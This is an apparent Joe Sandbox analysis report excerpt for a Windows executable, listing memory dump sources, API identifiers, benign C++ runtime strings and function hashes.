                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
                                                                    • API String ID: 0-4165567116
                                                                    • Opcode ID: 5fd983c037f3ecb858841f5b63359419f2ee617f3b682fd2cd8ec1173b2a215b
                                                                    • Instruction ID: 3c4bc855094e27a6a180a7938412d8307674f3587b2bb0720ce89023231f3fb1
                                                                    • Opcode Fuzzy Hash: 5fd983c037f3ecb858841f5b63359419f2ee617f3b682fd2cd8ec1173b2a215b
                                                                    • Instruction Fuzzy Hash: 9B51C6B2B05B43B0EB10AF25D5401A86B64FB14F94B9C4632DAACA7795EF3CE596C301
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
                                                                    • API String ID: 0-4165567116
                                                                    • Opcode ID: 2e7d8bc6db8043a146ff6947aafe9d6adb3b3bb0a7f6c8011dadfe895f5f87fa
                                                                    • Instruction ID: 4e29d29433d8a28c942a62ccdfc4834f6fc6a34bba6a13e34e5aa6b8eeeb3ce0
                                                                    • Opcode Fuzzy Hash: 2e7d8bc6db8043a146ff6947aafe9d6adb3b3bb0a7f6c8011dadfe895f5f87fa
                                                                    • Instruction Fuzzy Hash: 0651C6B2B05B43B0EB50AF25D4401A967A0FB18F94B9C4632DAACA77D5EF3CD596C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleValue$_endthreadexlongjmp
                                                                    • String ID:
                                                                    • API String ID: 3990644698-0
                                                                    • Opcode ID: 64af44273f167c6ad877b66a8271b90c8828086299775b24d211343f9edc84f1
                                                                    • Instruction ID: 8dd1f0eae0e56281de792a43c6f94909857bcfd6812f080670cc12abc420eb07
                                                                    • Opcode Fuzzy Hash: 64af44273f167c6ad877b66a8271b90c8828086299775b24d211343f9edc84f1
                                                                    • Instruction Fuzzy Hash: 6A510836A19B13A5FB999B11D5483B93AA4FF48B8AF4D4079CA0DA3391DF7CE484C341
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
                                                                    • API String ID: 0-3957588491
                                                                    • Opcode ID: 90e9a235c3baf15315dd5754873b62cb7da9049c760fac29f939e69ca475d171
                                                                    • Instruction ID: 604b2da80431b8758dd28cc11575a5da477c7b2ac47a61b16523394d04490b63
                                                                    • Opcode Fuzzy Hash: 90e9a235c3baf15315dd5754873b62cb7da9049c760fac29f939e69ca475d171
                                                                    • Instruction Fuzzy Hash: 6A315532A09B4BE5EE20AB19D2153F86BA4FB48B44F8C8136DA4CA7391DF3CE445C701
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleOpen_errno
                                                                    • String ID:
                                                                    • API String ID: 2250453136-0
                                                                    • Opcode ID: 804481c94524e79c3e56c53991d464a34c0d8cffbd2439700dc1c269fe1b29ae
                                                                    • Instruction ID: 2b50de7b3f39fa9f3fd1c35fdeb8dac820e2cc77096d72a124c1b052a8f7bbcf
                                                                    • Opcode Fuzzy Hash: 804481c94524e79c3e56c53991d464a34c0d8cffbd2439700dc1c269fe1b29ae
                                                                    • Instruction Fuzzy Hash: EE01F53292CA0BE7FBD56F61994117826A0BF4AB24F4C1A30CE2EA53D0DE3CB484C710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThreadfprintf
                                                                    • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                                                                    • API String ID: 1384477639-884133013
                                                                    • Opcode ID: 66961c87c69832063d6ef2cf05f65d98d545adb8271c9f1236b0f703b14b2a8c
                                                                    • Instruction ID: b2769cedc583ec8061c3101b377bb7dfe0259d3796eb762f5f0cd41a35739d42
                                                                    • Opcode Fuzzy Hash: 66961c87c69832063d6ef2cf05f65d98d545adb8271c9f1236b0f703b14b2a8c
                                                                    • Instruction Fuzzy Hash: 2E016D76A19747E6EA119F25E8014A87BA4BB88BD8F5C8135DE4CE3750EF3CE4428710
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :$default arg#${$}$}::
                                                                    • API String ID: 0-1396675520
                                                                    • Opcode ID: dbdfe7a09765517834bd71df3c1fd393ccdfb57157c89f17ae7f9f660f19c1fa
                                                                    • Instruction ID: 1ee0d1e26f74dcf4a9d337014270eff4969ec377442fb569f27191139e65ff84
                                                                    • Opcode Fuzzy Hash: dbdfe7a09765517834bd71df3c1fd393ccdfb57157c89f17ae7f9f660f19c1fa
                                                                    • Instruction Fuzzy Hash: 3791F572A0868397E7698B65A9003FA6B91FB45B98F6C4032CF9E57785DF7CE481D300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: DebuggerErrorFormatLastMessagePresent
                                                                    • String ID:
                                                                    • API String ID: 2392558662-0
                                                                    • Opcode ID: 9ab93466ed8d4e6054295730cbe503c77c3230275627338014f15eee742c3481
                                                                    • Instruction ID: 68ca0cdb7fc18d9b2898010ee6a9a9b22b02a76e221ec3790c4513ebe2f2e123
                                                                    • Opcode Fuzzy Hash: 9ab93466ed8d4e6054295730cbe503c77c3230275627338014f15eee742c3481
                                                                    • Instruction Fuzzy Hash: 01014B31A2CA03A1E6E09B26FC4573A2660BF88B84F4C0438DE4DE2764EE7CD040CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Wait$EventMultipleObjectObjectsResetSingle
                                                                    • String ID:
                                                                    • API String ID: 256776027-0
                                                                    • Opcode ID: 333640768f44088b6358db1d802b48c51ed78d25bcb5857e51e649b75cf48d90
                                                                    • Instruction ID: c9c0baec14368629f759e4bc73bd1a1e775f225b0f274b21c5353f25abb41c1c
                                                                    • Opcode Fuzzy Hash: 333640768f44088b6358db1d802b48c51ed78d25bcb5857e51e649b75cf48d90
                                                                    • Instruction Fuzzy Hash: 58517331E0D70361FAB9562697013FA08957F9C795F5C1436EE0EEABD1EE6CE881C211
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$wcslen
                                                                    • String ID: basic_string::append
                                                                    • API String ID: 1844840824-3811946249
                                                                    • Opcode ID: 4f35981e2956fcbfb4fc5bfff5f13df9ac9569ef0579284781b94cf1080cf309
                                                                    • Instruction ID: 95160e2bb63f3729f7c06620fe53d14f7fec057b3de64964a652d28efdf3406f
                                                                    • Opcode Fuzzy Hash: 4f35981e2956fcbfb4fc5bfff5f13df9ac9569ef0579284781b94cf1080cf309
                                                                    • Instruction Fuzzy Hash: 22516972A08A57B0EF10DF16D5488BD2761FB55BD4B9C8532DEAEA73E1EE28E541C300
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
                                                                    • API String ID: 0-126128797
                                                                    • Opcode ID: a7d147249b8188fe6aada238a8c67af0756d0aac0570078bca750538eec17cd2
                                                                    • Instruction ID: 9e6ffa5ec76a7f7b027271ebd5aa39ebf9ec3474a2780f33bfbc249aca6a352e
                                                                    • Opcode Fuzzy Hash: a7d147249b8188fe6aada238a8c67af0756d0aac0570078bca750538eec17cd2
                                                                    • Instruction Fuzzy Hash: DC41D476B05B47E0EB109F29D9408AC2760FB14F94B9C5632CA1DAB3A8FF6CD596C304
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem
                                                                    • String ID:
                                                                    • API String ID: 2086374402-0
                                                                    • Opcode ID: 7ea3cd9a7fec929e8e7181801140b1aa040794d3e43b1313136038803cab3235
                                                                    • Instruction ID: 715903738ffe32febbe2e7c5db00092eec86bc6c6bc0e3a116c4334f993a5855
                                                                    • Opcode Fuzzy Hash: 7ea3cd9a7fec929e8e7181801140b1aa040794d3e43b1313136038803cab3235
                                                                    • Instruction Fuzzy Hash: 4641E732B1425366FFA19A15A6986BB1594FF48794F4C4035DF1CD23C0EE3CE980C362
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: c3dbcde8f0b4fa2481ac558daa9862e56226f964894df8beb5549e6713ef9bca
                                                                    • Instruction ID: 8ff32b5b9ed36353f652b48803e3a26385eacd64d9ff59ed225150fed296bab2
                                                                    • Opcode Fuzzy Hash: c3dbcde8f0b4fa2481ac558daa9862e56226f964894df8beb5549e6713ef9bca
                                                                    • Instruction Fuzzy Hash: 5731D432B0921397FF669B15AA987AB2594EF48390F084475DE0CD6780EE38DC81C361
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterReleaseSemaphore
                                                                    • String ID:
                                                                    • API String ID: 2813224205-0
                                                                    • Opcode ID: 87c8e58c18ea95cf91d094f47a20d37f7ca4a1ecea6f371982ba1520a479a2f9
                                                                    • Instruction ID: 2af83cb4ddb40d5fafb8705772a67fa45bd47a3ef3c6a47c18761f402eab4cde
                                                                    • Opcode Fuzzy Hash: 87c8e58c18ea95cf91d094f47a20d37f7ca4a1ecea6f371982ba1520a479a2f9
                                                                    • Instruction Fuzzy Hash: 51014523F15607A2E7858F277C812759254BF98B72F884936CE0D86380DD3CD8C28700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
